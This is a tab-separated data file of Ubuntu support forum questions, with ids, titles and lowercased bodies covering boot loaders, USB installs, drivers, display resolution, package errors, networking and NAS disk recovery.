284207	installing ubuntu grub directly from ubuntu	i had windows 8 and ubuntu side by side managed by ubuntu grub menu . i installed open suse , and now open suse is managing all my operating systems . i want to remove open suse , i do n't have ubuntu live cd with me . i 'm able to boot into ubuntu through the open suse grub menu , is it possible to get back ubuntu grub from ubuntu directly and not from ubuntu live cd . what steps should be followed ?
284216	accessing mac filesystem from xubuntu	i have a macbook pro with 2 os 's ... mac osx and xubuntu ( newest release . ) i have followed a lifehacker guide on allowing access of my osx partition when booted into my linux os which included changing the linux uid , and disabling journaling on my hfs+ drive . i see my osx partition when booted in linux in my file browser , but when i go into it deeper , i get 'access denied . ' i see that , in osx 's disk utility , i have the option to disable encrypting , but when i hit it , nothing changes ... would that encryption be interfering ? any ideas ?
284221	why cant i load ubuntu 12.04 or 12.10 .	every time i try burn onto disk or usb , it comes back with errors or missing files , i really want to use ubuntu , but this keeps happening everytime , please help ! !
284222	how to install ubuntu on a mac without os x	i have a macbook air and no os x. i have , however , ubuntu burned to a usb drive and i can access the testing version of ubuntu , but of course i 'd like to have something a little more permanent . so my question is : how do i install ubuntu on a mac without os x . all of the guides i 've read are for those with os x and i can not seem to find anything for those that do not as i assume there are n't very many that are in my situation . i have tried to completely format my ssd by making a new partition table and then installing ubuntu , this however results in nothing being bootable ( except the test ubuntu from the usb ) . the computer just flashes a folder with an `` x '' on it . any help would be wonderful , thanks .
284224	autorun a script after i plugged or unplugged a usb device	what can i do to run automatically a script after i mount/plugin or unmount/unplug a usb device ?
284227	ubuntu 12.04.2 showing a kernel panic at the startup	i 'm using a acer laptop 5100 ( athlon 64 tk-53 , ati 1100 , 320gb hd , 4gb ram , broadcom 4311 wifi ) , and i was using for some time ubuntu 10.04 and later 10.10 64-bit versions without a single freeze . i spent the last 4 days working on a way to make 12.04 lts work on this machine . thank god i bought a new hd and saved my original 10.10 , because there 's no way to make the new lts run on this machine . i downloaded and installed both 12.04.2 32- and 64-bit and none worked after the installation . as soon the machine starts , before the login screen , it shows a kernel panic in text mode , after that the machine freezes , and only the power button solves it . i tried ubuntu 12.04.1 ( 32- and 64-bit ) , and they worked fine before the updates . immediately after the updates , the kernel panic shows up on the login again . i 'm working on a 12.04.1 32-bit without the updates . could it be related to the new hwe ? or does the new kernel have some issue with my hardware ? thanks for the help .
284231	easy painless backup of server ?	i 've recently started playing around with ubuntu server , trying out everything i can imagine . along the way i 've made some mistakes , poor choices and installed some crap that ill never need . my plan , now that i half way know what i 'm doing , is to start from scratch again , and only mess with the minimal settings/programs and have it as streamlined as it can be . once i 'm done , i 'd like to make a backup of everything except a giant data hdd that is n't part of the small install disk ( installed on sda , data on sdb ) so that in the case the file system hdd fails , i can swap it out and recover and move on . what would be the most painless way to do this ? also , if that did happen and i needed to recover , all i would need to do is remount the data hdd and it would work the same as before , right ?
284232	how to use virtual-box / unsuported usb hardware / us144 in ubuntu ?	is it is possible to forward hardware , which ubuntu doesnt support ? in my case i want to use a tascam us-144 audio interface into a vm ( which contains windows ) where the hardware can be recognized and used . is this possible ?
284234	when will eclipse juno ( 4.2 ) be coming to ubuntu ?	there are many web pages that describe how to install eclipse juno on various versions of ubuntu , but i was wondering when it will be released properly in the default ubuntu repositories ? i notice that the new release of 13.04 is still at version 3.8 . is there a chance of it making it in to the 13.10 release ? edit : as i state in my original question , there are may web pages that describe how to install eclipse juno , so please do not answer with an installation guide for 4.2 .
284239	install 13.04 or stay with 12.04 lts ?	i 've been excited about 13.04 since reading about the new features and new designs made in it . i tried using 12.10 but , in my opinion it is okay and feels a little sluggish to me . 13.04 is suppose to be faster and more stable then 12.10 so , i think i like 13.04 more . i 'm only disappointed with raring ringtail 's support for 9 months instead of 18 months . would 13.04 support really end at january or will it last a little longer to use by then . or is ubuntu 12.04 lts a wiser decision to choose ?
284243	if i create a live usb bootable distro with persistence files , can i later use the usb to install to the hard drive ?	i need to know if i create a live usb bootable distro with persistence files , can i later use the usb to install the distro to the hard drive ? if so will the persistence files install the distro in the like manner in which i have adjusted settings and downloaded extra packages that the distro did n't have to begin with ? i searched and searched about this topic with google but i do n't see the answer anywhere . if the installation to hard drive with persistence files is ok , is it a safe practice ? i ask this because i have an old hp 533w with about 1g ram and a 60 g hard drive.the modem is how you go online with it , so i need a preconfigured linux os to be able to use the setup without going online . also does any distro automatically carry the codecs for sound and being able to use audio editors and drivers for cd rom drives . this question would help a lot of people trying to switch over from the panes ( pains ) os onto any type of computer without internet access . thank you and may god bless your day !
284244	`` load kernel '' error on usb boot ?	i followed these instructions : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows when i try to boot from bios into ubuntu it asks if i want to try without installing ( yes , that 's exactly what i 'm trying to do ) it then tells me a file is missing and i need to load the kernel first . i see others have asked similar questions but no clear answers for a noob . i 've never used any form of linux before . am i doing something wrong somewhere or do those instructions not work ? thanks
284250	lubuntu 12.04 : can not transfer files from the laptop to the nexus 7	i just recently got myself a nexus 7 and i want to load it up with some apps that i 've downloaded on the laptop . the problem is that i ca n't get the nexus 7 to mount on the laptop . i 've tried different ports but they all lead to the same result . i 've even tried connecting it as a camera , but then i would n't be able to access the whole device .
284251	error starting firefox	after latest updates this week , firefox will not start . when launching from terminal , it prints the following error three times before quitting : ** ( firefox:13010 ) : warning ** : failed to open webapp application path dir /usr/local/share/unity-webapps/userscripts : error opening directory '/usr/local/share/unity-webapps/userscripts ' : no such file or directory running ubuntu 12.10 64bit
284252	why would i install a dns server on my ubuntu server ?	when you install ubuntu server , the default ubuntu server will only store the core system , but there is an option to add additional server roles . one of these is a `` dns server '' . from what i read , when you add this choice to your installation , ubuntu adds the bind9 and bind9-doc packages to your system . these packages provide the bind 9 dns server and its documentation . now in fact a dns server is simply a technology that takes a host name and automatically finds the ip address for that host on the internet . whenever you purchase a domain , for example , on godaddy , you have the option on their website to point that hostname at your public ip address . it 's that simple . so why would anyone need to set up a dns server on their ubuntu installation ?
284259	what should i do with the upgrade ?	i have dual booted ubuntu 12.10 and windows 8 . recently , i have upgraded to 13.04 beta but i found there were some problems so i upgraded to beta 2. i lost all the programs i had . i tryed to install google chrome but failed so now i am stuck with chromiun instead . there are many irratating bugs that really get on my nerves and some of the features have been gotten a rid of . what sould i do wait till ubuntu 13.04 official release comes out or just downgrade back into ubuntu 12.10 . i have already made a bootable usb to prepare myself to go back into ubuntu 12.10 but should i do it . is it really worth the time and patience .
284260	ubuntu hangs on start on system that have windows 7	i have installed ubuntu 12.10 using live-usb stick on a system that have windows 7 in asus 1025ce , but after selecting ubuntu in boot menu , system not started in first time and these messages appeared : . . starting : crash report submission daemon starting : regular background program processing daemon starting : deferred execution scheduler stopping starting : lightdm display manager starting : configure network device security starting : cpu interrupts balancing daemon starting : configure virtual network devices stopping : save kernel messages and i waited for minutes , but system not starts . how can i fix this problem ?
284261	ca n't install clementine , dependency issue	this is the message i get when trying to reinstall clementine in the ubuntu software centre . and i tried to reinstall the packages in synaptic package manager , but nothing helps ... i am pretty lost in what to do next , cause i tried a lot of different solutions . clementine : depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20 is to be installed depends : libechonest1.2 ( > = 1.2.0 ) but 1.2.1-1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.7.2-2ubuntu1 is to be installed depends : libglib2.0-0 ( > = 2.22.0 ) but 2.34.1-1ubuntu1 is to be installed depends : libmtp9 ( > = 1.1.0 ) but 1.1.4-1 is to be installed depends : libqt4-dbus ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqt4-network ( > = 4:4.6.1 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqt4-opengl ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3 is to be installed depends : libqt4-sql ( > = 4:4.5.3 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.3+dfsg-0ubuntu3.1 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.7.2-2ubuntu1 is to be installed depends : libtag1c2a ( > = 1.7 ) but 1.8-0ubuntu2 is to be installed depends : zlib1g ( > = 1:1.1.4 ) but 1:1.2.7.dfsg-13 is to be installed depends : projectm-data ( > = 2.0.1+dfsg-6 ) but 2.1.0+dfsg-1build1 is to be installed
284264	alarm clock for 12.04	looking for a alarm clock for ubuntu 12.04 with following repeat an alarm after user defined period of time can be paused can be reset shows a visual indication at alarm time visual indication should remain till it is dismissed by user
284265	13.04 freezing ( new install , with nothing installed yet e.g . drivers )	ubuntu 13.04 keeps freezing on the desktop , it does n't matter what i 'm doing it just freezes , the cursor still works but no other input e.g . keyboard . this is with a clean install , i have n't even installed drivers yet . it did last long enough to install the amd drivers ( 13.3 beta 3 ) once but froze after the drivers had finished installing but before i could reboot , so i had to reboot and then x would n't start . i log in and there 's no gui , alt-ctrl-del to logout and try the guest account and still no interface .
284270	sopcast and sp-auth on ubuntu 12.10 64-bit	where is the 64bit package of sp-auth on the site ? ( launchpad ) .. only i386 and it 'll not work of course .
284274	installing ubuntu with the windows installer ( wubi ) !	if i installing ubuntu with the windows installer , will it create a partition in my hard disk ? and after installing if i want to uninstall it what to do ?
284275	how to give a path argument to os.walk ( ) python function for my home directory ?	i want to use os.walk ( ) in python and i have to give a path argument to it like os.walk ( path ) . in windows , i do it as os.walk ( c : \\ ) . what os.walk ( ) does is it searches the whole c : directory . in ubuntu , i want to search the whole home folder so what should be my path and how will i write it in os.walk ( ) ? my code : import os from os.path import join lookfor = `` sh.txt '' for root , dirs , files in os.walk ( ' $ home\\ ' ) : if lookfor in files : print `` found : % s '' % join ( root , lookfor ) break
284276	how can connect server using .ppk key file	i am new in linux . i am using winscp and putty pageant file ( .ppk ) file to connect server in windows my questions are what is a program similar to winscp ? how can i use my current .ppk file in linux ? sorry for my poor english . thanks jobish .
284281	y500 lan device not recognised	i got a lenovo y500 and installed 3.5.0-27-generic # 46-ubuntu smp mon mar 25 19:58:17 utc 2013 x86_64 x86_64 x86_64 gnu/linux . the problem : lan does not work after sleep . just wifi . and wifi does not work properly . i am already using alx driver how can i get the lan interface up and running ? lspci -nnk | grep -iea3 `` ( wireless|network|wifi ) '' 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2230 [ 8086:0888 ] ( rev c4 ) subsystem : intel corporation centrino wireless-n 2230 bgn [ 8086:4262 ] kernel driver in use : iwlwifi kernel modules : iwlwifi 04:00.0 system peripheral [ 0880 ] : jmicron technology corp. sd/mmc host controller [ 197b:2392 ] ( rev 30 ) subsystem : lenovo device [ 17aa:3977 ] kernel driver in use : sdhci-pci only when i restart laptop with lan cable plugged in the ethernet controller is available : 02:00.0 ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 10 )
284284	wacom tablet support in ubuntu	i am thinking of buying a wacom bamboo pen tablet for drawing with an ubuntu installation . i seem to remember there being settings specifically for wacom in the settings manager . is that still the case ? ( i am currently not on ubuntu , so i ca n't verify ) . the searching that i have done have brought up results in threads where people have to do manual setup ( editing of config files ) to get their wacom tablets working . is that the case or is there good support for wacom tablets ( with graphical configuration ) in ubuntu ?
284285	do the features in new ubuntu releases get backported to the lts ?	i am thinking of installing either ubuntu 12.04 ( lts ) or waiting for 13.04 to be released . my question is : will all the updates that appear in the new release also be made available to the lts release ? in other words , will all the improvements to unity , all the new features etc. , be available to 12.04 as well ? or should i go for 13.04 if i want all the newest features ?
284287	can not ssh until pinging url	if , after starting system ( freshly installed linux mint 13 ) , i try to run : ssh mywebsite.com it hangs up with `` connection timed out '' . but when i open the browser and enter mywebsite.com there ( or even run ping ) , ssh suddenly starts working . the same happens with one program accessing it 's api through https . i can not use it until i access api through the browser . the same happens with rdp protocol . remmina/rdesktop do n't work until i ping specific url . maybe it 's dns related ? what can i do to debug/fix this issue ?
284291	dual ( triple ? ) monitor problem with qq + nouveau	i 'm running ubuntu 12.10 on a dell latitude with an nvidia nvs 4200m video card . i 'm trying to get it to work with 3 monitors connected : the laptop 's , one connected via vga , and another via hdmi . ( i 've done this without any problems on windows 7 ) it does n't matter if i start it up with the hdmi monitor connected or not , it always detects only the vga one , and i can work with 2 monitors ( the laptop one + the vga one ) . i 've been struggling all day with getting nvidia 's drivers to work without any luck ( tried all experimental versions , and also nvidia-current and nvidia-current-updates ) , until i eventually gave up and reverted back to nouveau . xrandr does not show the hdmi monitor : screen 0 : minimum 320 x 200 , current 3840 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1920x1080 60.0*+ 40.0 59.9 1680x1050 60.0 59.9 ( ... more ) vga1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 1680x1050 60.0 ( ... more ) anyone has any ideas how i can get my hdmi monitor properly detected ? thanks edit : i also tried the ubuntu-x-swat versions unsuccessfully .
284293	ubuntu 12.04 does n't boot from usb	i downloaded ubuntu 12.04 desktop edition . used universal usb installer to create a bootable usb . restarted with the usb plugged in . pressed f10 and selected sony ( my pendrive model ) . system restarted and is now stuck at a black screen with a cursor blinking . additional info : i created an iso file from ubuntu 10.10 and burn it to the flash drive using universal usb installer . system proceeded till the screen where it asks me to `` try ubuntu '' . but when i click it , the pure black screen with ubuntu written at the bottom that appears slowly fades to a different black with the name slowly fading out . and it does not proceed any further . ( i went through some of the other posts and i understand that it may be a problem due to the `` modeset '' , but please confirm ) edit : fixed the problem by selecting `` help me boot from cd '' option . it extracted the files from the pen drive and asked me to reboot . worked perfectly . thanks for all the help . cheers .
284295	how do i enable the alx ethernet driver on ubuntu 13.04 ?	i just upgraded to ubuntu 13.04 64 bit on my lenovo ideapad laptop and am having trouble getting the ethernet to work . the alx driver required for my laptop 's ar8161 gigabit ethernet controller to work have not been included in previous versions of ubuntu , so i used to install the the driver using the compat-wireless-pc driver package . now ubuntu 13.04 comes with the alx driver , however it does not appear to be functional . when i plug in an ethernet cable , it is not detected . i have verified the alx module exists $ modinfo alx filename : /lib/modules/3.8.0-19-generic/kernel/ubuntu/alx/alx.ko version : 1.2.3 license : dual bsd/gpl description : qualcomm atheros gigabit ethernet driver author : qualcomm corporation , < nic-devel @ qualcomm.com > srcversion : deb551a4f9d0281f98f5f10 alias : pci : v00001969d000010a0sv*sd*bc*sc*i* alias : pci : v00001969d000010a1sv*sd*bc*sc*i* alias : pci : v00001969d00001090sv*sd*bc*sc*i* alias : pci : v00001969d00001091sv*sd*bc*sc*i* depends : mdio intree : y vermagic : 3.8.0-19-generic smp mod_unload modversions and is loaded . $ lsmod | grep alx alx 67960 0 mdio 13807 1 alx any suggestions on how to get my ethernet up and running ?
284297	ubuntu display resolution issue	i just did a clean install of the 64-bit version of ubuntu 12.10 on a dell inspiron 660 and i 'm having trouble with my display setup . the pc has an ivy bridge i5 with integrated graphics , and the drivers are recognized and seem to be installed correctly . the problem is i 'm stuck with my resolution set to 1024x768 or 800x600 even though i 'm on a 16:9 widescreen monitor . ubuntu also can not identify the display . i browsed some posts for various older ubuntu versions for display issues and tinkered a little with xrandr and tried to force the display to a proper 1440x900 resolution , but could n't get anything to work ( i 'm a first time linux user so i probably did n't accomplish much ) . anyone have a similar issue or a recommendation on how to get my display set up correctly ? i 'm hooked to my monitor by vga , and the monitor also has a dvi input , while the pc has vga and hdmi out . i 'm debating getting an hdmi to dvi cable to see if using digital input fixes anything .
284298	windows 7 , xubuntu 12.10 and ubuntu 13.04 triple-double boot : )	i currently have windows 7 and xubuntu 12.10 and that is working fine . now i want to make some free space out of windows partition and install ubuntu 13.04 on it . so my question is : would that be a problem ( two versions of ubuntu and windows ) ? would be some grub conflicts ? p.s . i know that i can test new ubuntu using live boot or via virtualbox but i want to see how it works with property drivers . sorry for my poor english and thanks .
284303	installing ubuntu percise or ringtail on a toshiba sateillite l45 s4687	was just wondering if anyone has had any issues installing ubuntu precise on a toshiba satellite l45 s4687.and if you think ring tail will run.i donât know what the specs are yet.but.it is running vista now.i will be doing a fresh install of ubuntu.thanks.it will have 2 gigs ram.40 gig storage.possibly more.no dual booting . i will be deleting vista and installing ubuntu .
284305	unity 2d on ubuntu 13.04 ? or is it too fast to matter	i 've consistently always needed to stick to older computers at home . i 've tried both 'unity2d ' and '3d ' on my present computer ( toshiba satellite , ati mobility 4200 series gpu , can post lshw if it 's critical to do so ) and i 've noted that 3d mode is a notable performance hit , to pretty much every aspect of the computer . ubuntu 13.04 is being lauded as being quite fast - but 'unity2d ' is being dropped , is it not ? do the performance increases which most people seem to be experiencing require unity3d ? before people recommend other desktops - i 've tried them and i just do n't care for them i 'm afraid . i really like the unity desktop , and while i guess i could adapt to something else i just strongly prefer this ux to the others , so before telling me to switch des i 'd like to understand a little more about the nature of the performance improvements .
284306	why is gksu no longer installed by default ?	i have always recommended pressing alt+f2 and typing for example gksu nautilus or gksudo nautilus both are equivalent ; to run graphical programs with root privileges . however , i have just installed raring on a test system and this no longer works . gksu and gksudo are not installed as part of a default raring install ; though they are in the repositories . in 12.04 at least gksudo was just a symbolic link to gksu the reasons i have always done this are because while it is often safe to use sudo under some circumstances it can cause problems with graphical applications because gksu has you running the program as root while with sudo you are running as yourself but with elevated privileges . this can mean you inadvertently change the owner of critical system files . this can cause problems . this reasoning is explained better here : running sudo graphically -- psychocats root sudo - comunity ubuntu documentation what is the difference between “gksudo nautilus” and “sudo nautilus” ? on askubuntu why was command removed from a fresh install and what should we be using instead ?
284309	fix overscan/ underscan on hdtv intel hd graphics card	i have my laptop running ubuntu 12.10 hooked up via hdmi to my 24inch , 1080p hdtv though i am experiencing an overscan problem . when the tv cis connected , it can not be run at the 1080x720 resolution ( on display settings within ubuntu ) as the tv cuts off about 10 % of each side and corner on the hdtv . the only way i can get a full picture/ proper resolution is to change the resolution ( within ubuntu 's display settings ) for the hdtv to 1366x768 ( same as the laptop 's screen settings ) unfortunately , there is no option on my remote/tv to adjust the overscan settings manually and was hoping there was a way to gain full control of these settings within ubuntu to gain a proper resolution on the hdtv with the hdmi cable . when i run windows , i am able to use the 'intel catalyst control centre ' to adjust the overscan/underscan from within windows , and that works fine . is there something like this ( preferably with a gui interface ) thanks
284315	upgrade from 12.04 to 12.10 : black screen with intel hd 4000	yesterday i updated ubuntu from 12.04 to 12.10 . i also had to reinstall grub , but after rebooting my machine and selecting `` ubuntu '' from the list , a black screen appeared . following this suggestion , i overwrote quiet splash with nomodeset in the edit options , as adviced . now i can follow the boot procedure , and appearently something is wrong with my graphic device ( there is a line saying load default graphic device [ failed ] ) . the login screen never shows up , the boot just seems to stop at some point . is there any help ? i own a thinkpad x230 , 8 gb , with intel hd graphics . the previous ubuntu version worked just fine .
284324	is there any way to get proper unity webapps integration in firefox ?	in chromium , if i open , say , facebook as a webapp , the window that appears has no url , tabs , nor bookmarks bar -- making it a web app rather than just a browser window . however , if i do the same thing in firefox , i just get a normal window with url bar , etc. , which fragments my browsing experience , because then tabs open in webapp windows and whatnot . my question is : is there any way to get proper webapps support in firefox ? especially considering firefox is the default browser ... thanks in advance .
284325	ubuntu 12.04 virtual machine windows 7 networking	i installed vmware workstation ( 9.0 ) on my windows 7 pc , and installed ubuntu 12.04 . i got everything else working except that i can not seem to get networking going in the ubuntu box . in the vmware settings , i tried both nat and bridged connections ( with `` replicate physical networking connection state '' and without it ) . my windows pc 's ifconfig looks like this : ethernet adapter local area connection 3 : connection-specific dns suffix . : something.net link-local ipv6 address . . . . . : fe80 : :7598 : cf46:98b:5b ipv4 address . . . . . . . . . . . : 10.155.10.214 subnet mask . . . . . . . . . . . : 255.255.252.0 default gateway . . . . . . . . . : 10.155.8.1 ethernet adapter vmware network adapter vmnet1 : connection-specific dns suffix . : link-local ipv6 address . . . . . : fe80 : :e870 : d3cf:21b9:1 ipv4 address . . . . . . . . . . . : 192.168.237.1 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : ethernet adapter vmware network adapter vmnet8 : connection-specific dns suffix . : link-local ipv6 address . . . . . : fe80 : :e0a0 : d219 : ed1b:1 ipv4 address . . . . . . . . . . . : 192.168.126.1 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : and the ifconfig ( linux ) looks like this : eth0 link encap : ethernet hwaddr 00:0c:29 : b6:6a:8d inet6 addr : fe80 : :20c:29ff : feb6:6a8d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:653 errors:0 dropped:0 overruns:0 frame:0 tx packets:2127 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:52484 ( 52.4 kb ) tx bytes:223515 ( 223.5 kb ) interrupt:19 base address:0x2000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:279 errors:0 dropped:0 overruns:0 frame:0 tx packets:279 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23884 ( 23.8 kb ) tx bytes:23884 ( 23.8 kb ) my /etc/network/interfaces file looks like this : auto lo iface lo inet loopback regards deepak
284328	thinkpad t61 wo n't wake from sleep / suspend 13.04	my laptop is a lenovo thinkpad t61 with intel graphics card running 13.04 . i 'm pretty sure that when my battery gets too low , the laptop suspends itself , but when i plug it back in , it wo n't come on . actually , if i 've been playing music or video , i can hear the sound , often glitching and skipping , but there is absolutely no response from the monitor . the indicator lights come on , as if the computer is running , but no buttons work provoke a response , except when i hold the power button down for an extended time to shut the computer off . please help : almost everything else on the computer works perfectly . thanks guys .
284330	in unity , all `` o '' are showing up as `` v ''	since today , in ubuntu 12.10 running unity , my font has been doing something strange . the o characters are showing up as v. see the graphics below . for example , the desktop folder on this file open dialog is spelled as desktvp . any ideas would be most appreciated .
284332	how do i change the color of my bash commands ( only ) in a terminal ?	i 've played with color codes to jazz up my prompt , but is there a way to change the color of what i type after said prompt to make my commands a little more distinctive in the scrollback ? i can leave an open color code tag which sort-of works ( not really ) ; it bleeds up to the first colored bit in the output ( which may or may not exist ) .
284338	trouble installing ubuntu 12.10 on macbook pro	i converted the iso file into a img image . made the bootable drive , restart and choose to boot from drive . when it boots from the drive , i get secure boot not enabled . then i get try ubuntu and install ubuntu , drive appears to be working , but when i choose either one of the options i get a black screen but nothing happens , any help with this ?
284339	why am i getting the error e : package php5-gd has no installation candidate when trying to install php5-gd ?	i am trying to install php5-gd and receive this error reading package lists ... done building dependency tree reading state information ... done package php5-gd is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package php5-gd has no installation candidate i am not sure why this would be , i checked dpkg -l | grep php and noticed php5-gd was installed at one point . i am not sure why it or how it was removed but i need it installed . dpkg -l | grep php rc php5-gd 5.2.10.dfsg.1-2ubuntu6 gd module for php5 ii libapache2-mod-php5 5.2.10.dfsg.1-2ubuntu6 server-side , html-embedded scripting languag ii php5 5.2.10.dfsg.1-2ubuntu6 server-side , html-embedded scripting languag ii php5-cli 5.2.10.dfsg.1-2ubuntu6 command-line interpreter for the php5 script ii php5-common 5.2.10.dfsg.1-2ubuntu6 common files for packages built from the php ii php5-mysql 5.2.10.dfsg.1-2ubuntu6 mysql module for php5 i have checked my sources.list , here it is : http : //pastie.org/7699452 ( the paste was too long so i opt 'd to use a paste service ) i have ran apt-get update as well to be sure . could anyone recommend how i can fix this so i can get php5-gd installed ?
284340	why is the library 's linker name only in the -dev package ?	take a package like sqlite3 : http : //packages.ubuntu.com/lucid/i386/libsqlite3-0/filelist http : //packages.ubuntu.com/lucid/i386/libsqlite3-dev/filelist note that the linker name ( /usr/lib/libsqlite3.so ) only appear in the -dev package . the same pattern holds true for almost all shared libraries . why ? wo n't this confuse programs that tries to dynamically load sqlite3 using dlopen ( `` libsqlite3.so '' ) when that file is missing unless you have the -dev variant ?
284346	recovery data from failed raid disk - nas	my western digital my world book white light nas drive stopped working . this has a single 1tb disk . at first i started getting the following error : volume status - volume 'datavolume ' does n't exist then the nas refused to boot . so i 've removed the disk from the nas and connected it to my ubuntu laptop using a sata to usb cable . running testdisk returns this : code : sat apr 20 08:40:11 2013 command line : testdisk testdisk 6.11 , data recovery utility , april 2009 christophe grenier < grenier @ cgsecurity.org > http : //www.cgsecurity.org os : linux , kernel 3.0.0-21-generic ( # 35-ubuntu smp fri may 25 17:58:20 utc 2012 ) compiler : gcc 4.5 - oct 17 2010 20:12:36 ext2fs lib : 1.41.14 , ntfs lib : 10:0:0 , reiserfs lib : none , ewf lib : none /dev/sda : lba , hpa , lba48 , dco support /dev/sda : size 312581808 sectors /dev/sda : user_max 312581808 sectors /dev/sda : native_max 312581808 sectors /dev/sda : dco 312581808 sectors warning : ca n't get size for disk /dev/mapper/control - 0 b - chs 1 1 1 , sector size=512 hard disk list disk /dev/sda - 160 gb / 149 gib - chs 19457 255 63 , sector size=512 - ata st9160310as disk /dev/sdb - 1000 gb / 931 gib - chs 121601 255 63 , sector size=512 - wdc wd10 ears-00mvwb0 partition table type ( auto ) : efi gpt disk /dev/sdb - 1000 gb / 931 gib - wdc wd10 ears-00mvwb0 partition table type : efi gpt analyse disk /dev/sdb - 1000 gb / 931 gib - chs 121601 255 63 hdr_size=92 hdr_lba_self=1 hdr_lba_alt=1953525167 ( expected 1953525167 ) hdr_lba_start=34 hdr_lba_end=1953525134 hdr_lba_table=2 hdr_entries=128 hdr_entsz=128 check_part_gpt failed for partition 1 p ms reserved 34 262177 262144 [ microsoft reserved partition ] current partition structure : no fat , ntfs , ext2 , jfs , reiser , cramfs or xfs marker 1 p ms reserved 34 262177 262144 [ microsoft reserved partition ] 1 p ms reserved 34 262177 262144 [ microsoft reserved partition ] search_part ( ) disk /dev/sdb - 1000 gb / 931 gib - chs 121601 255 63 recover_ext2 : s_block_group_nr=0/14 , s_mnt_count=100/33 , s_blocks_per_group=32768 , s_inodes_per_group=16352 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 489968 recover_ext2 : part_size 3919744 ms data 64320 3984063 3919744 ext3 sparse superblock , 2006 mb / 1913 mib raid magic value at 247/254/8 raid apparent size : 3919744 sectors raid chunk size : 0 bytes md0 md 0.90.0 raid 1 : devices 0 ( 8,1 ) * linux raid 64320 3984191 3919872 [ md0 ] md 0.90.0 raid 1 : devices 0 ( 8,1 ) * , 2006 mb / 1914 mib linux swap 3984192 4497967 513776 swap2 version 1 , 263 mb / 250 mib raid magic value at 279/251/37 raid apparent size : 513792 sectors raid chunk size : 0 bytes md1 md 0.90.0 raid 1 : devices 0 ( 8,2 ) * linux raid 3984192 4498111 513920 [ md1 ] md 0.90.0 raid 1 : devices 0 ( 8,2 ) * , 263 mb / 250 mib recover_ext2 : s_block_group_nr=0/7 , s_mnt_count=82/23 , s_blocks_per_group=32768 , s_inodes_per_group=7728 recover_ext2 : s_blocksize=4096 recover_ext2 : s_blocks_count 246976 recover_ext2 : part_size 1975808 ms data 4498176 6473983 1975808 ext3 large file sparse superblock , 1011 mb / 964 mib raid magic value at 402/251/42 raid apparent size : 1975808 sectors raid chunk size : 0 bytes md3 md 0.90.0 raid 1 : devices 0 ( 8,3 ) * linux raid 4498176 6474111 1975936 [ md3 ] md 0.90.0 raid 1 : devices 0 ( 8,3 ) * , 1011 mb / 964 mib raid magic value at 402/254/45 raid apparent size : 3733254810 sectors mybookworld:2 md 1.x raid 1 - array slot : 0 ( 0 ) linux raid 6474176 1953524869 1947050694 [ mybookworld:2 ] md 1.x raid 1 - array slot : 0 ( 0 ) , 996 gb / 928 gib results ms data 64320 3984063 3919744 ext3 sparse superblock , 2006 mb / 1913 mib linux raid 64320 3984191 3919872 [ md0 ] md 0.90.0 raid 1 : devices 0 ( 8,1 ) * , 2006 mb / 1914 mib linux swap 3984192 4497967 513776 swap2 version 1 , 263 mb / 250 mib linux raid 3984192 4498111 513920 [ md1 ] md 0.90.0 raid 1 : devices 0 ( 8,2 ) * , 263 mb / 250 mib ms data 4498176 6473983 1975808 ext3 large file sparse superblock , 1011 mb / 964 mib linux raid 4498176 6474111 1975936 [ md3 ] md 0.90.0 raid 1 : devices 0 ( 8,3 ) * , 1011 mb / 964 mib p linux raid 6474176 1953524869 1947050694 [ mybookworld:2 ] md 1.x raid 1 - array slot : 0 ( 0 ) , 996 gb / 928 gib when i run testdisk the results table shows all the entries with a d in front of them , apart from the last one which has ap i 've done a deeper scan , that took all day.. and this is the result : disk /dev/sdb - 1000 gb / 931 gib - chs 121601 255 63 check the harddisk size : hd jumpers settings , bios detection ... the harddisk ( 1000 gb / 931 gib ) seems too small ! ( < 1965 gb / 1830 gib ) the following partitions ca n't be recovered : ms data 67319776 2014370271 1947050496 xfs 6.2+ - bitmap version , 996 gb / 928 gib ms data 128165104 2075215599 1947050496 xfs 6.2+ - bitmap version , 996 gb / 928 gib mac hfs 128167720 2074956007 1946788288 hfsx , 996 gb / 928 gib mac hfs 128190436 2074978723 1946788288 this goes on for thousands of lines ... ... .. could someone please advise what this means and more importantly if my data is recoverable and how ? ? many thanks
284349	gnome-panel icons spacing	i 'm using gnome classic with no effects because compiz is slow on my notebook . everything is fine except panel icons - they are too wide . they look ok with compiz . how can i make them look the same in gnome classic with no effects ? with compiz :
